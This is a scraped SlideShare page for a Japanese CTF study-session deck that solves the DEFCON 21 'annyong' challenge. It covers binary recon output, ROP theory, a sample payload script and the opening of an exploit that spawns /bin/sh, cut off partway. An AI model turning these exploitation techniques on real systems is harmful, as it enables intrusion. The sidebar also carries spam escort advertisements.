Suche senden
Hochladen
第二回CTF勉強会資料
•
0 gefällt mir
•
752 views
Asuka Nakajima
Folgen
DEFCON 21 exploit 4: annyong
Weniger lesen
Mehr lesen
Ingenieurwesen
Melden
Teilen
Melden
Teilen
1 von 26
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
世界一わかりやすいClean Architecture
世界一わかりやすいClean Architecture
Atsushi Nakamura
暗号技術の実装と数学
暗号技術の実装と数学
MITSUNARI Shigeo
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
Kentaro Matsui
Pythonによる黒魔術入門
Pythonによる黒魔術入門
大樹 小倉
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
Shota Shinogi
TLS, HTTP/2演習
TLS, HTTP/2演習
shigeki_ohtsu
Empfohlen
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
世界一わかりやすいClean Architecture
世界一わかりやすいClean Architecture
Atsushi Nakamura
暗号技術の実装と数学
暗号技術の実装と数学
MITSUNARI Shigeo
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
Kentaro Matsui
Pythonによる黒魔術入門
Pythonによる黒魔術入門
大樹 小倉
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
Shota Shinogi
TLS, HTTP/2演習
TLS, HTTP/2演習
shigeki_ohtsu
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
CODE BLUE
ELFの動的リンク
ELFの動的リンク
7shi
20分くらいでわかった気分になれるC++20コルーチン
20分くらいでわかった気分になれるC++20コルーチン
yohhoy
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
Preferred Networks
BuildKitによる高速でセキュアなイメージビルド
BuildKitによる高速でセキュアなイメージビルド
Akihiro Suda
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
Masahito Zembutsu
katagaitai CTF勉強会 #5 Crypto
katagaitai CTF勉強会 #5 Crypto
trmr
コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線
Motonori Shindo
CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料
SECCON Beginners
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
Preferred Networks
C++の話(本当にあった怖い話)
C++の話(本当にあった怖い話)
Yuki Tamura
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
NTT DATA Technology & Innovation
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
Glibc malloc internal
Glibc malloc internal
Motohiro KOSAKI
BuildKitの概要と最近の機能
BuildKitの概要と最近の機能
Kohei Tokunaga
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
Google Cloud Platform - Japan
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
虎の穴 開発室
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Brendan Gregg
Weitere ähnliche Inhalte
Was ist angesagt?
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
CODE BLUE
ELFの動的リンク
ELFの動的リンク
7shi
20分くらいでわかった気分になれるC++20コルーチン
20分くらいでわかった気分になれるC++20コルーチン
yohhoy
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
Preferred Networks
BuildKitによる高速でセキュアなイメージビルド
BuildKitによる高速でセキュアなイメージビルド
Akihiro Suda
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
Masahito Zembutsu
katagaitai CTF勉強会 #5 Crypto
katagaitai CTF勉強会 #5 Crypto
trmr
コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線
Motonori Shindo
CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料
SECCON Beginners
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
Preferred Networks
C++の話(本当にあった怖い話)
C++の話(本当にあった怖い話)
Yuki Tamura
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
NTT DATA Technology & Innovation
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
Glibc malloc internal
Glibc malloc internal
Motohiro KOSAKI
BuildKitの概要と最近の機能
BuildKitの概要と最近の機能
Kohei Tokunaga
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
Google Cloud Platform - Japan
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
虎の穴 開発室
Was ist angesagt?
(20)
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
ELFの動的リンク
ELFの動的リンク
20分くらいでわかった気分になれるC++20コルーチン
20分くらいでわかった気分になれるC++20コルーチン
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
Pythonの理解を試みる 〜バイトコードインタプリタを作成する〜
BuildKitによる高速でセキュアなイメージビルド
BuildKitによる高速でセキュアなイメージビルド
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
katagaitai CTF勉強会 #5 Crypto
katagaitai CTF勉強会 #5 Crypto
コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線
CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
PFNのML/DL基盤を支えるKubernetesにおける自動化 / DevOpsDays Tokyo 2021
C++の話(本当にあった怖い話)
C++の話(本当にあった怖い話)
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Docker Compose 徹底解説
Docker Compose 徹底解説
Glibc malloc internal
Glibc malloc internal
BuildKitの概要と最近の機能
BuildKitの概要と最近の機能
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
GKE に飛んでくるトラフィックを 自由自在に操る力 | 第 10 回 Google Cloud INSIDE Games & Apps Online
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
Supabase Edge Functions と Netlify Edge Functions を使ってみる – 機能とその比較 –
Ähnlich wie 第二回CTF勉強会資料
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Brendan Gregg
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Positive Hack Days
Debugging 2013- Jesper Brouer
Debugging 2013- Jesper Brouer
Mediehuset Ingeniøren Live
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniques
Satpal Parmar
Inside Winnyp
Inside Winnyp
FFRI, Inc.
The true story_of_hello_world
The true story_of_hello_world
fantasy zheng
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Linaro
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
Lex Yu
[CCC'21] Evaluation of Work Stealing Algorithms
[CCC'21] Evaluation of Work Stealing Algorithms
Universidad de los Andes
Performance Wins with eBPF: Getting Started (2021)
Performance Wins with eBPF: Getting Started (2021)
Brendan Gregg
ARM 64bit has come!
ARM 64bit has come!
Tetsuyuki Kobayashi
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Yulia Tsisyk
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
Cyber Security Alliance
Hacklu11 Writeup
Hacklu11 Writeup
nkslides
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device Drivers
Satpal Parmar
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Jagadisha Maiya
Systems@Scale 2021 BPF Performance Getting Started
Systems@Scale 2021 BPF Performance Getting Started
Brendan Gregg
How to debug ocfs2 hang problem
How to debug ocfs2 hang problem
Gang He
Scale17x buffer overflows
Scale17x buffer overflows
johseg
Ähnlich wie 第二回CTF勉強会資料
(20)
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Debugging 2013- Jesper Brouer
Debugging 2013- Jesper Brouer
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniques
Inside Winnyp
Inside Winnyp
The true story_of_hello_world
The true story_of_hello_world
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
[CCC'21] Evaluation of Work Stealing Algorithms
[CCC'21] Evaluation of Work Stealing Algorithms
Performance Wins with eBPF: Getting Started (2021)
Performance Wins with eBPF: Getting Started (2021)
ARM 64bit has come!
ARM 64bit has come!
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
Hacklu11 Writeup
Hacklu11 Writeup
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Systems@Scale 2021 BPF Performance Getting Started
Systems@Scale 2021 BPF Performance Getting Started
How to debug ocfs2 hang problem
How to debug ocfs2 hang problem
Scale17x buffer overflows
Scale17x buffer overflows
Mehr von Asuka Nakajima
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Asuka Nakajima
[Dagstuhl Seminar 17281] Similarity Calculation Method for Binary Executables
[Dagstuhl Seminar 17281] Similarity Calculation Method for Binary Executables
Asuka Nakajima
技術紹介: S2E: Selective Symbolic Execution Engine
技術紹介: S2E: Selective Symbolic Execution Engine
Asuka Nakajima
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
Asuka Nakajima
[CSS×2.0 2014] Polyglotシェルコードの最高記録に挑戦しよう☆
[CSS×2.0 2014] Polyglotシェルコードの最高記録に挑戦しよう☆
Asuka Nakajima
[セキュリティ・キャンプフォーラム 2014] 卒業生プレゼンテーション 『私とセキュリティと過去と未来』
[セキュリティ・キャンプフォーラム 2014] 卒業生プレゼンテーション 『私とセキュリティと過去と未来』
Asuka Nakajima
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
Asuka Nakajima
[AsiaCCS2019] A Pilot Study on Consumer IoT Device Vulnerability Disclosure a...
[AsiaCCS2019] A Pilot Study on Consumer IoT Device Vulnerability Disclosure a...
Asuka Nakajima
2014年10月江戸前セキュリティ勉強会資料 -セキュリティ技術者になるには-
2014年10月江戸前セキュリティ勉強会資料 -セキュリティ技術者になるには-
Asuka Nakajima
Mehr von Asuka Nakajima
(9)
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
[Dagstuhl Seminar 17281] Similarity Calculation Method for Binary Executables
[Dagstuhl Seminar 17281] Similarity Calculation Method for Binary Executables
技術紹介: S2E: Selective Symbolic Execution Engine
技術紹介: S2E: Selective Symbolic Execution Engine
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
[CSS×2.0 2014] Polyglotシェルコードの最高記録に挑戦しよう☆
[CSS×2.0 2014] Polyglotシェルコードの最高記録に挑戦しよう☆
[セキュリティ・キャンプフォーラム 2014] 卒業生プレゼンテーション 『私とセキュリティと過去と未来』
[セキュリティ・キャンプフォーラム 2014] 卒業生プレゼンテーション 『私とセキュリティと過去と未来』
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[AsiaCCS2019] A Pilot Study on Consumer IoT Device Vulnerability Disclosure a...
[AsiaCCS2019] A Pilot Study on Consumer IoT Device Vulnerability Disclosure a...
2014年10月江戸前セキュリティ勉強会資料 -セキュリティ技術者になるには-
2014年10月江戸前セキュリティ勉強会資料 -セキュリティ技術者になるには-
Kürzlich hochgeladen
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
ankushspencer015
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
ranjana rawat
result management system report for college project
result management system report for college project
Tonystark477637
Vivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design Spain
timesproduction05
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Call Girls in Nagpur High Profile
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
KreezheaRecto
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Christo Ananth
Extrusion Processes and Their Limitations
Extrusion Processes and Their Limitations
120cr0395
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
sanyuktamishra911
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Call Girls in Nagpur High Profile
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.ppt
DineshKumar4165
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
rknatarajan
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
Call for Papers - International Journal of Intelligent Systems and Applicatio...
Call for Papers - International Journal of Intelligent Systems and Applicatio...
Christo Ananth
Thermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - V
DineshKumar4165
University management System project report..pdf
University management System project report..pdf
Kamal Acharya
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
rknatarajan
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
SUHANI PANDEY
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Dr.Costas Sachpazis
Kürzlich hochgeladen
(20)
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
result management system report for college project
result management system report for college project
Vivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design Spain
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Extrusion Processes and Their Limitations
Extrusion Processes and Their Limitations
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.ppt
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
Call for Papers - International Journal of Intelligent Systems and Applicatio...
Call for Papers - International Journal of Intelligent Systems and Applicatio...
Thermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - V
University management System project report..pdf
University management System project report..pdf
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
第二回CTF勉強会資料
1.
2014年度 第0x2回 CTF勉強会 2014年4月22日 NTTセキュアプラットフォーム研究所 中島明日香 1
2.
DEFCON 21 exploit
4点 → 問題ファイル名: annyong → ファイル形式: x86-64,ELF 2
3.
最初のステップ [1/10] ファイル調査 file defconctf_18_bin100.bin defconctf_18_bin100.bin: ELF
32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0xaac9a3648c835ecfc1ce5c634e280dbc95713027, stripped → fileコマンド → 実行 ./annyong AAA AAA BBB BBB ccc ccc 3echoプログラム?
4.
最初のステップ [2/10] → 実行 ./annyong AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA
(略) Segmentation fault (core dumped) 4 バッファオーバーフロー
5.
最初のステップ [3/10] → 実行 ./annyong %p 0xffffffff %c � %d -1 %s Segmentation
fault (core dumped) 5 フォーマットストリングスバグ
6.
最初のステップ [4/10] → 実行 ./annyong %n I
don't think so... n I don't think so... 6 %nは利用出来ない?
7.
最初のステップ [5/10] → stringsコマンド strings
annyong /lib64/ld-linux-x86-64.so.2 __gmon_start__ _Jv_RegisterClasses libc.so.6 setuid fflush exit initgroups puts stdin printf fgets getpwnam chdir Read (略) setresgid failed setresuid failed setgid failed setegid failed setuid failed seteuid failed chdir failed I don't think so... ;*3$" 7
8.
最初のステップ [6/10] → straceコマンド strace
./annyong execve("./annyong", ["./annyong"], [/* 45 vars */]) = 0 (略) mmap(0x7fdcb3cd7000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b5000) = 0x7fdcb3cd7000 mmap(0x7fdcb3cdd000, 17624, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdcb3cdd000 close(3) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdcb3eee000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdcb3eed000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdcb3eec000 arch_prctl(ARCH_SET_FS, 0x7fdcb3eed700) = 0 mprotect(0x7fdcb3cd7000, 16384, PROT_READ) = 0 mprotect(0x7fdcb4108000, 4096, PROT_READ) = 0 mprotect(0x7fdcb3f04000, 4096, PROT_READ) = 0 munmap(0x7fdcb3eef000, 76252) = 0 fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdcb3f01000 read(0, 8
9.
最初のステップ [7/10] → hexdumpコマンド hexdump
-C ./annyong 00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 03 00 3e 00 01 00 00 00 60 0c 00 00 00 00 00 00 |..>.....`.......| 00000020 40 00 00 00 00 00 00 00 e0 21 00 00 00 00 00 00 |@........!......| 00000030 00 00 00 00 40 00 38 00 09 00 40 00 1c 00 1b 00 |....@.8...@.....| 00000040 06 00 00 00 05 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000050 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 |@.......@.......| 00000060 f8 01 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 |................| 00000070 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 |................| 00000080 38 02 00 00 00 00 00 00 38 02 00 00 00 00 00 00 |8.......8.......| 00000090 38 02 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 |8...............| 9
10.
最初のステップ [8/10] → readelfコマンド readelf
–a annyong ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xc60 Start of program headers: 64 (bytes into file) Start of section headers: 8672 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 28 Section header string table index: 27 10
11.
最初のステップ [9/10] → readelfコマンド Program
Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R E 8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001c 0x000000000000001c R 1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000001434 0x0000000000001434 R E 200000 LOAD 0x0000000000001df0 0x0000000000201df0 0x0000000000201df0 0x00000000000002d8 0x00000000000002e8 RW 200000 DYNAMIC 0x0000000000001e18 0x0000000000201e18 0x0000000000201e18 0x0000000000000190 0x0000000000000190 RW 8 NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254 0x0000000000000044 0x0000000000000044 R 4 GNU_EH_FRAME 0x000000000000129c 0x000000000000129c 0x000000000000129c 0x0000000000000054 0x0000000000000054 R 4 GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 RW 8 GNU_RELRO 0x0000000000001df0 0x0000000000201df0 0x0000000000201df0 0x0000000000000210 0x0000000000000210 R 1 11
12.
12 最初のステップ [10/10] Checksec.sh http://www.trapkit.de/tools/checksec.html → checksec.shを利用する ./checksec.sh
--file annyong RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH annyong Partial RELRO, NX, PIEが有効
13.
13 NX Non Execute
Bit PIE Position-independent-Code RELRO relocation read only
14.
解析について どこに何の脆弱性があるかを考える → 時間が限られてるので全部解析は難しい → バッファーオーバーフロー 14 →
フォーマットストリングスバグ → IDAproを開く
15.
解析のステップ 15 → sub_108C → ユーザー入力を受け付け、 もし入力文字列にnが含まれていたら 「I
don’t think so..」を出力。 そうでなかったら、入力文字列を 表示する。
16.
攻略の仕方 1.バッファーオーバーフロー検知はしていない 2.スタック上のコードの実行権限はない 3.%nが利用不可。GOT Overwriteは出来ない 4.ASRLとPIEが有効。アドレスが固定ではない → ROP
Exploitで任意のコードを実行させる
17.
17 ROP(Return Oriented Programming)とは →Return
Address Saved Frame Pointer buffer バッファオーバーフロー時 上書き可能 add_func JUNK JUNK arg1 arg2 100 100 ROP GADGET add_func exit func 200 200 add_func(int a,int b){ return a+b } pop ebx pop ebp ret
18.
18 Import sys From struct
import * Add_function = 0x80484a7 Exit_func = 0xb7e5efb0 Rop_gadget = 0x8048587 Sc = “x90x90x90x90x90x90x90x90” Sc += “x90x90x90x90x90x90x90x90” Sc += pack(‘<L‘, add_function) Sc += pack(‘<L‘, rop_gadget) Sc += “3333” Sc += “4444” Sc += pack(‘<L’,add_function) Sc + = pack(‘<L’,exit_function) Sc += “3333” Sc += “4444” Sys.stdout.write(sc) ROP Exploit (例)
19.
19 Exploitの方針 1.実行アドレスのベースを調べる (PIE/ASLR) 2.Libcのベースを調べる System関数を呼び出して任意のコマンド(/bin/sh)を実行 3.System関数のオフセットを調べる 4. “/bin/sh”文字列のオフセットを調べる 5.
ROP用のシェルコードを生成する 6. 実行する
20.
20 Exploit [1/3] import
socket, telnetlib from struct import pack, unpack def p64(addr): return pack("<Q", addr) def interact(s): t = telnetlib.Telnet() t.sock = s t.interact() s.close() def send_recv(s, buf): s.send(buf) return s.recv(4096) HOST = "localhost" PORT = 5679 s = socket.socket() s.connect((HOST, PORT))
21.
21 Exploit [2/3] r =
